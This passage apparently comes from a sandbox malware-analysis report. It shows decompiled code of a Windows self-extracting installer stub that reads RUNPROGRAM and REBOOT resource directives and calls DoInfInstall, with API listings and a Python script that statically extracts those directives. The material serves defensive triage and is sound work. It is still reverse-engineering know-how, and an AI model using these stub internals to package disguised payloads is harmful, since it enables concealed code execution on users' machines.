	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	// Align the stack and reserve the local frame (0x194 bytes).
	_t164 = (_t162 & 0xfffffff8) - 0x194;
	// Stack-cookie setup: the global security cookie is XORed with the frame pointer
	// and checked again on return via E00176CE0.
	_t69 =  *0x178004; // 0x4ffa21aa
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x179124 =  *0x179124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x178a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			// Zero a 0x44-byte (68-byte) block and store 0x44 in its first dword:
			// the size and layout match a 32-bit STARTUPINFOA with cb = sizeof(STARTUPINFOA).
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x178c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			// Read a "SHOWWINDOW" value (up to 4 bytes) into _v396 via the helper at E0017468F.
			_t115 = E0017468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
				// 0x80070714 is HRESULT_FROM_WIN32(0x714), i.e. ERROR_RESOURCE_DATA_NOT_FOUND.
				 *0x179124 = 0x80070714;
				goto L62;
			} else {
				// _v304 and _v300 sit at offsets 0x2C and 0x30 of the block, the positions of
				// dwFlags and wShowWindow in STARTUPINFOA; 1 is STARTF_USESHOWWINDOW.
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
						goto L14;
					}
					_push(6);
					_v304 = 1;
					_pop(0);
					goto L11;
				} else {
					_v304 = 1;
					L11:
					_v300 = 0;
					L14:
					if(_t127 != 0) {
						L27:
						_t155 = 1;
						__eflags = _t127 - 1;
						if(_t127 != 1) {
							L31:
							_t132 =  &_v280;
							_t76 = E00171AE8( &_v280,  &_v408,  &_v404); // executed
							__eflags = _t76;
							if(_t76 == 0) {
								L62:
								_t77 = 0;
								L63:
								_pop(_t150);
								_pop(_t156);
								_pop(_t128);
								// Epilogue: E00176CE0 verifies the stack cookie before returning _t77.
								return E00176CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
							}
							_t157 = _v404;
							__eflags = _t149;
							if(_t149 != 0) {
								L37:
								__eflags = _t157;
								if(_t157 == 0) {
									L57:
									_t151 = _v408;
									_t146 =  &_v352;
									_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00173FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x178580;
                                                                                                                                                                                                    													if( *0x178580 != 0) {
                                                                                                                                                                                                    														E00172267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x178180;
                                                                                                                                                                                                    											if( *0x178180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E001744B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x179124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x179a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00176495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E001744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x179124 = E00176285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E001744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x178a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0x179a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0x178a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0x179154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0x1791e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0x178a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0x179a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0x178d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0x179a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0x17a288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0x179124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
									_t127 = _v400;
									goto L58;
								}
							}
							__eflags =  *0x179a40 - 1; // 0x3
							if(__eflags == 0) {
								goto L37;
							}
							__eflags =  *0x178a20;
							if( *0x178a20 == 0) {
								goto L37;
							}
							__eflags = _t157;
							if(_t157 != 0) {
								goto L38;
							}
							_v388 = 1;
							E0017202A(_t146); // executed
							goto L37;
						}
						_t146 =  &_v280;
						_t108 = E0017468F("POSTRUNPROGRAM",  &_v280, 0x104);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L25;
						}
						__eflags =  *0x178c42;
						if( *0x178c42 != 0) {
							goto L69;
						}
						_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
						__eflags = _t112 == 0;
						if(_t112 == 0) {
							goto L69;
						}
						goto L31;
					}
					_t118 =  *0x178a38; // 0x0
					if(_t118 == 0) {
						L23:
						if(_t153 != 0) {
							goto L31;
						}
						_t146 =  &_v276;
						if(E0017468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
							goto L27;
						}
						goto L25;
					}
					if((_t118 & 0x00000001) == 0) {
						__eflags = _t118 & 0x00000002;
						if((_t118 & 0x00000002) == 0) {
							goto L62;
						}
						_t140 = "USRQCMD";
						L20:
						_t146 =  &_v276;
						if(E0017468F(_t140,  &_v276, 0x104) == 0) {
							goto L25;
						}
						if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
							_t153 = 1;
							_v388 = 1;
						}
						goto L23;
					}
					_t140 = "ADMQCMD";
					goto L20;
				}
			}
			L26:
			_push(_t130);
			_t146 = 0x104;
			E00171781( &_v276, 0x104, _t130, 0x178c42);
			goto L27;
		}
	}
	_t130 = "REBOOT";
	_t125 = E0017468F(_t130, 0x179a2c, 4);
	if(_t125 == 0 || _t125 > 4) {
		goto L25;
	} else {
		goto L3;
	}
}

Instruction address column of the decompiled listing (detached from its code lines by extraction; 0x00000000 marks lines without an address):
0x00173baa 0x00173bb0 0x00173bb7 0x00173bc0 0x00173bc2 0x00173bc9 0x00173bcb 0x00173bcf 0x00173bd3 0x00173bd9
0x00173bfd 0x00173bfd 0x00173bff 0x00173c03 0x00173c03 0x00173c11 0x00173c16 0x00173c19 0x00173c28 0x00000000
0x00000000 0x00173c30 0x00173c39 0x00173c40 0x00173d13 0x00173d15 0x00173d21 0x00173d26 0x00000000 0x00173c4f
0x00173c56 0x00173c60 0x00173c65 0x00173c77 0x00173c78 0x00173c7c 0x00173c7e 0x00173c82 0x00173c82 0x00000000
0x00173c7c 0x00173c67 0x00173c69 0x00173c6d 0x00000000 0x00173c58 0x00173c58 0x00173c6e 0x00173c6e 0x00173c87
0x00173c89 0x00173d4d 0x00173d4f 0x00173d50 0x00173d52 0x00173d9e 0x00173da8 0x00173daf 0x00173db4 0x00173db6
0x00173f4d 0x00173f4d 0x00173f4f 0x00173f56 0x00173f57 0x00173f58 0x00173f63 0x00173f63 0x00173dbc 0x00173dc0
0x00173dc2 0x00173de6 0x00173de6 0x00173de8 0x00173f0b 0x00173f0b 0x00173f0f 0x00173f13 0x00173f15 0x00173f1a
0x00173f1c 0x00173f46 0x00173f47 0x00000000 0x00173f47
                                                                                                                                                                                                    0x00173f1e
                                                                                                                                                                                                    0x00173f1f
                                                                                                                                                                                                    0x00173f25
                                                                                                                                                                                                    0x00173f26
                                                                                                                                                                                                    0x00173f2a
                                                                                                                                                                                                    0x00173f2d
                                                                                                                                                                                                    0x00173fd9
                                                                                                                                                                                                    0x00173fd9
                                                                                                                                                                                                    0x00173fda
                                                                                                                                                                                                    0x00173fda
                                                                                                                                                                                                    0x00173fe1
                                                                                                                                                                                                    0x00173fe3
                                                                                                                                                                                                    0x00173fe3
                                                                                                                                                                                                    0x00173fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173fe8
                                                                                                                                                                                                    0x00173f33
                                                                                                                                                                                                    0x00173f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f37
                                                                                                                                                                                                    0x00173dee
                                                                                                                                                                                                    0x00173dee
                                                                                                                                                                                                    0x00173df5
                                                                                                                                                                                                    0x00173fad
                                                                                                                                                                                                    0x00173fb9
                                                                                                                                                                                                    0x00173fc2
                                                                                                                                                                                                    0x00173fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173fc8
                                                                                                                                                                                                    0x00173dfb
                                                                                                                                                                                                    0x00173dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173e03
                                                                                                                                                                                                    0x00173e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173e15
                                                                                                                                                                                                    0x00173e17
                                                                                                                                                                                                    0x00173e19
                                                                                                                                                                                                    0x00173f94
                                                                                                                                                                                                    0x00173fa4
                                                                                                                                                                                                    0x00173f7c
                                                                                                                                                                                                    0x00173f80
                                                                                                                                                                                                    0x00173f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f8b
                                                                                                                                                                                                    0x00173e2c
                                                                                                                                                                                                    0x00173e30
                                                                                                                                                                                                    0x00173e34
                                                                                                                                                                                                    0x00173e36
                                                                                                                                                                                                    0x00173f69
                                                                                                                                                                                                    0x00173f6e
                                                                                                                                                                                                    0x00173f70
                                                                                                                                                                                                    0x00173f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f76
                                                                                                                                                                                                    0x00173e3c
                                                                                                                                                                                                    0x00173e43
                                                                                                                                                                                                    0x00173e47
                                                                                                                                                                                                    0x00173e52
                                                                                                                                                                                                    0x00173e56
                                                                                                                                                                                                    0x00173e5c
                                                                                                                                                                                                    0x00173e61
                                                                                                                                                                                                    0x00173e68
                                                                                                                                                                                                    0x00173e70
                                                                                                                                                                                                    0x00173e74
                                                                                                                                                                                                    0x00173e7c
                                                                                                                                                                                                    0x00173e80
                                                                                                                                                                                                    0x00173e82
                                                                                                                                                                                                    0x00173e82
                                                                                                                                                                                                    0x00173e87
                                                                                                                                                                                                    0x00173e87
                                                                                                                                                                                                    0x00173e8b
                                                                                                                                                                                                    0x00173e91
                                                                                                                                                                                                    0x00173e94
                                                                                                                                                                                                    0x00173e96
                                                                                                                                                                                                    0x00173e96
                                                                                                                                                                                                    0x00173e9b
                                                                                                                                                                                                    0x00173e9b
                                                                                                                                                                                                    0x00173e9f
                                                                                                                                                                                                    0x00173ea2
                                                                                                                                                                                                    0x00173ea4
                                                                                                                                                                                                    0x00173ea4
                                                                                                                                                                                                    0x00173ea9
                                                                                                                                                                                                    0x00173ea9
                                                                                                                                                                                                    0x00173ead
                                                                                                                                                                                                    0x00173eb3
                                                                                                                                                                                                    0x00173eb6
                                                                                                                                                                                                    0x00173eb8
                                                                                                                                                                                                    0x00173eb8
                                                                                                                                                                                                    0x00173ebd
                                                                                                                                                                                                    0x00173ebd
                                                                                                                                                                                                    0x00173ec1
                                                                                                                                                                                                    0x00173ec3
                                                                                                                                                                                                    0x00173ec5
                                                                                                                                                                                                    0x00173ec5
                                                                                                                                                                                                    0x00173eca
                                                                                                                                                                                                    0x00173eca
                                                                                                                                                                                                    0x00173ece
                                                                                                                                                                                                    0x00173ed5
                                                                                                                                                                                                    0x00173ed9
                                                                                                                                                                                                    0x00173ee0
                                                                                                                                                                                                    0x00173ee6
                                                                                                                                                                                                    0x00173eea
                                                                                                                                                                                                    0x00173eec
                                                                                                                                                                                                    0x00173eee
                                                                                                                                                                                                    0x00173ef3
                                                                                                                                                                                                    0x00173ef3
                                                                                                                                                                                                    0x00173ef5
                                                                                                                                                                                                    0x00173efa
                                                                                                                                                                                                    0x00173efb
                                                                                                                                                                                                    0x00173efd
                                                                                                                                                                                                    0x00173f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173eff
                                                                                                                                                                                                    0x00173eff
                                                                                                                                                                                                    0x00173f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f05
                                                                                                                                                                                                    0x00173efd
                                                                                                                                                                                                    0x00173dc7
                                                                                                                                                                                                    0x00173dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173dd0
                                                                                                                                                                                                    0x00173dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173dd9
                                                                                                                                                                                                    0x00173ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173ddd
                                                                                                                                                                                                    0x00173de1

APIs
• memset.MSVCRT ref: 00173C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00173CDC
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
  • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
  • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
  • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
  • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
  • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00178C42), ref: 00173D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00173E26
• FreeLibrary.KERNEL32(00000000,?,00178C42), ref: 00173EFF
• LocalFree.KERNEL32(?,?,?,?,00178C42), ref: 00173F1F
• FreeLibrary.KERNEL32(00000000,?,00178C42), ref: 00173F40
• LocalFree.KERNEL32(?,?,?,?,00178C42), ref: 00173F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00178C42), ref: 00173F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00178C42), ref: 00173F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00178C42), ref: 00173FC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
• API String ID: 1032054927-1170992343
• Opcode ID: 7876ae0a282d3a51085a66f9fe3f49ad7379efbd3af3c2d30fcc79f00d129fae
• Instruction ID: e4f46227b4866b30b52ab57ca4c74ead2dbdc955fc15dad6b569499ca835e2ea
• Opcode Fuzzy Hash: 7876ae0a282d3a51085a66f9fe3f49ad7379efbd3af3c2d30fcc79f00d129fae
• Instruction Fuzzy Hash: B5B10170A483019BD730DF64C849B6B76F4EB94750F10892EFAADD3191DB70CA84EB92
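The API sequence listed above is a stub reading its own installation directives out of the PE resource section: subcall 0017468F does FindResourceA(…, "TITLE", 0x0A) (0x0A is RT_RCDATA), then SizeofResource / LoadResource / LockResource / memcpy_s / FreeResource, and the caller compares each fetched value against "<None>" with CompareStringA before resolving advpack.dll!DoInfInstall and writing into the IXP000.TMP directory named in the String ID list. The other resource names that feed those compares (RUNPROGRAM, POSTRUNPROGRAM, ADMQCMD, USRQCMD, SHOWWINDOW, REBOOT) appear in the same list. The script below is an added example, not code from the report or from the sample: it walks a raw .rsrc section statically and pulls out the same directives, so the RUNPROGRAM / POSTRUNPROGRAM command lines of such a stage can be read without executing it. The assumption that the directives live as named RT_RCDATA entries whose ANSI value "<None>" means "unset" is inferred from the FindResourceA and CompareStringA arguments above; the build_rsrc() helper, the section RVA 0x5000 and the directive values in the demo are constructed test input, not data taken from this sample.

```python
import struct

RT_RCDATA = 10                      # FindResourceA(..., "TITLE", 0x0A) above
UNSET = "<None>"                    # value the stub CompareStringA's against
# Directive names taken from the report's String ID list for this function.
# Assumption: each is a named RT_RCDATA resource holding an ANSI string.
DIRECTIVES = {"TITLE", "RUNPROGRAM", "POSTRUNPROGRAM", "ADMQCMD",
              "USRQCMD", "SHOWWINDOW", "REBOOT"}


def _read_name(rsrc, off):
    # IMAGE_RESOURCE_DIR_STRING_U: WORD Length, then Length UTF-16LE chars
    (length,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")


def walk_resources(rsrc, section_rva, dir_off=0, path=()):
    """Yield (type, name, lang, data) for each leaf of a raw .rsrc section.
    section_rva is the section's RVA: data entries store RVAs, not offsets."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    entry = dir_off + 16
    for _ in range(n_named + n_id):
        name_field, data_field = struct.unpack_from("<II", rsrc, entry)
        entry += 8
        key = (_read_name(rsrc, name_field & 0x7FFFFFFF)
               if name_field & 0x80000000 else name_field)
        if data_field & 0x80000000:          # high bit set: subdirectory
            yield from walk_resources(rsrc, section_rva,
                                      data_field & 0x7FFFFFFF, path + (key,))
            continue
        data_rva, size = struct.unpack_from("<II", rsrc, data_field)
        start = data_rva - section_rva
        if start < 0 or start + size > len(rsrc):
            raise ValueError("resource data entry points outside .rsrc")
        leaf = (path + (key,) + (None, None, None))[:3]
        yield leaf[0], leaf[1], leaf[2], rsrc[start:start + size]


def extract_directives(rsrc, section_rva):
    """Return {name: value} for directives present and not set to "<None>"."""
    found = {}
    for rtype, name, _lang, data in walk_resources(rsrc, section_rva):
        if rtype == RT_RCDATA and name in DIRECTIVES:
            value = data.split(b"\x00", 1)[0].decode("latin-1")
            if value != UNSET:
                found[name] = value
    return found


def build_rsrc(section_rva, rcdata):
    """Constructed test input: a minimal type -> name -> language .rsrc tree
    holding rcdata (name -> ANSI string) as named RT_RCDATA resources."""
    names = sorted(rcdata)                 # named entries are kept sorted
    n = len(names)
    type_dir = 16 + 8                      # root: header + one ID entry
    lang_dirs = type_dir + 16 + 8 * n      # one 24-byte dir per name
    data_entries = lang_dirs + 24 * n
    strings = data_entries + 16 * n
    enc = [s.encode("utf-16-le") for s in names]
    blobs = [rcdata[s].encode("latin-1") + b"\x00" for s in names]
    blob_off = strings + sum(2 + len(e) for e in enc)
    out = bytearray(struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1))
    out += struct.pack("<II", RT_RCDATA, 0x80000000 | type_dir)
    out += struct.pack("<IIHHHH", 0, 0, 0, 0, n, 0)
    str_off = strings
    for i, e in enumerate(enc):
        out += struct.pack("<II", 0x80000000 | str_off,
                           0x80000000 | (lang_dirs + 24 * i))
        str_off += 2 + len(e)
    for i in range(n):                     # language dir: one ID entry, 0x409
        out += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)
        out += struct.pack("<II", 0x409, data_entries + 16 * i)
    for b in blobs:                        # IMAGE_RESOURCE_DATA_ENTRY
        out += struct.pack("<IIII", section_rva + blob_off, len(b), 0, 0)
        blob_off += len(b)
    for e in enc:
        out += struct.pack("<H", len(e) // 2) + e
    for b in blobs:
        out += b
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: two directives set, two left at "<None>".
    sample = build_rsrc(0x5000, {"TITLE": "Setup", "RUNPROGRAM": "cmd /c setup.inf",
                                 "POSTRUNPROGRAM": UNSET, "REBOOT": UNSET})
    print(extract_directives(sample, 0x5000))
```

On a real file, feed walk_resources() the bytes of the .rsrc section and that section's VirtualAddress from the section table; the bounds check on each data entry matters there, because a packed or truncated stage can carry data entries whose RVA falls outside the section, and an unchecked slice would silently return empty bytes instead of flagging the corruption.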
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 141 171ae8-171b2c call 171680 144 171b2e-171b39 141->144 145 171b3b-171b40 141->145 146 171b46-171b61 call 171a84 144->146 145->146 149 171b63-171b65 146->149 150 171b9f-171bc2 call 171781 call 17658a 146->150 152 171b68-171b6d 149->152 157 171bc7-171bd3 call 1766c8 150->157 152->152 154 171b6f-171b74 152->154 154->150 156 171b76-171b7b 154->156 158 171b83-171b86 156->158 159 171b7d-171b81 156->159 166 171d73-171d7f call 1766c8 157->166 167 171bd9-171bf1 CompareStringA 157->167 158->150 162 171b88-171b8a 158->162 159->158 161 171b8c-171b9d call 171680 159->161 161->157 162->150 162->161 175 171d81-171d99 CompareStringA 166->175 176 171df8-171e09 LocalAlloc 166->176 167->166 168 171bf7-171c07 GetFileAttributesA 167->168 170 171d53-171d5e 168->170 171 171c0d-171c15 168->171 173 171d64-171d6e call 1744b9 170->173 171->170 174 171c1b-171c33 call 171a84 171->174 188 171e94-171ea4 call 176ce0 173->188 190 171c35-171c38 174->190 191 171c50-171c61 LocalAlloc 174->191 175->176 181 171d9b-171da2 175->181 178 171dd4-171ddf 176->178 179 171e0b-171e1b GetFileAttributesA 176->179 178->173 183 171e67-171e73 call 171680 179->183 184 171e1d-171e1f 179->184 186 171da5-171daa 181->186 195 171e78-171e84 call 172aac 183->195 184->183 189 171e21-171e3e call 171781 184->189 186->186 192 171dac-171db4 186->192 189->195 211 171e40-171e43 189->211 198 171c40-171c4b call 171a84 190->198 199 171c3a 190->199 191->178 194 171c67-171c72 191->194 193 171db7-171dbc 192->193 193->193 200 171dbe-171dd2 LocalAlloc 193->200 202 171c74 194->202 203 171c79-171cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->203 210 171e89-171e92 195->210 198->191 199->198 200->178 207 171de1-171df3 call 17171e 200->207 202->203 208 171cc2-171ccc 203->208 209 171cf8-171d07 203->209 207->210 213 171cd3-171cf3 call 171680 * 2 208->213 214 171cce 208->214 216 171d23 209->216 217 171d09-171d21 GetShortPathNameA 209->217 210->188 211->195 215 171e45-171e65 call 1716b3 * 2 211->215 213->210 214->213 215->195 218 171d28-171d2b 216->218 217->218 222 171d32-171d4e call 17171e 218->222 223 171d2d 218->223 222->210 223->222
C-Code - Quality: 82%
E00171AE8(long __ecx, CHAR** _a4, int* _a8) {
	signed int _v8;
	char _v268;
	char _v527;
	char _v528;
	char _v1552;
	CHAR* _v1556;
	int* _v1560;
	CHAR** _v1564;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t48;
	CHAR* _t53;
	CHAR* _t54;
	char* _t57;
	char* _t58;
	CHAR* _t60;
	void* _t62;
	signed char _t65;
	intOrPtr _t76;
	intOrPtr _t77;
	unsigned int _t85;
	CHAR* _t90;
	CHAR* _t92;
	char _t105;
	char _t106;
	CHAR** _t111;
	CHAR* _t115;
	intOrPtr* _t125;
	void* _t126;
	CHAR* _t132;
	CHAR* _t135;
	void* _t138;
	void* _t139;
	void* _t145;
	intOrPtr* _t146;
	char* _t148;
	CHAR* _t151;
	void* _t152;
	CHAR* _t155;
	CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00171680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
